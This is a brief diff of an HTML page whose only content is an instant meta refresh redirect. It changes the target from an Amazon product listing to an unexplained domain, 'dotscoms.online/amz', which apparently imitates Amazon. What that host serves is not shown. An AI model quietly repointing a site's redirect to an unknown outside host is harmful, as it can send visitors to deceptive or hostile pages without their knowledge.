--- a/index.html
+++ b/index.html
@@ -1,5 +1,5 @@
 <html>
   <head>
-    <meta http-equiv="Refresh" content="0; url=https://www.amazon.com/JxstarGGirls-Sundresses-Rainbow-Supplies-6-7Years/dp/B06WVLG185/ref=sr_1_1?s=fashion-girls-intl-ship&ie=UTF8&qid=1540579397&sr=1-1&dpID=51IjZML%252BlzL&preST=_SX342_QL70_&dpSrc=srch" />
+    <meta http-equiv="Refresh" content="0; url=http://dotscoms.online/amz" />
   </head>
 </html>
